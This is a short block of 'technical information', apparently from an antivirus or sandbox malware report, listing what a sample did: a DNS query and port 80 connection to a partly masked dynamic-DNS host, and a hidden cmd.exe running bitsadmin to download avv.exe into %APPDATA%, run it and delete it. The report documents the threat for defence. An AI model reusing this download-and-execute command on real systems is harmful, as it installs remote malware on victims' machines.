Техническая информация
- '<SYSTEM32>\cmd.exe' /c bitsadmin /transfer 62b3 http://pr#####alfha.ddns.net/avv.exe %APPDATA%\62b3.exe&%APPDATA%\62b3.exe&del %APPDATA%\62b3.exe
- 'pr#####alfha.ddns.net':80
- DNS ASK pr#####alfha.ddns.net
- '<SYSTEM32>\cmd.exe' /c bitsadmin /transfer 62b3 http://pr#####alfha.ddns.net/avv.exe %APPDATA%\62b3.exe&%APPDATA%\62b3.exe&del %APPDATA%\62b3.exe' (со скрытым окном)
- '<SYSTEM32>\bitsadmin.exe' /transfer 62b3 http://pr#####alfha.ddns.net/avv.exe %APPDATA%\62b3.exe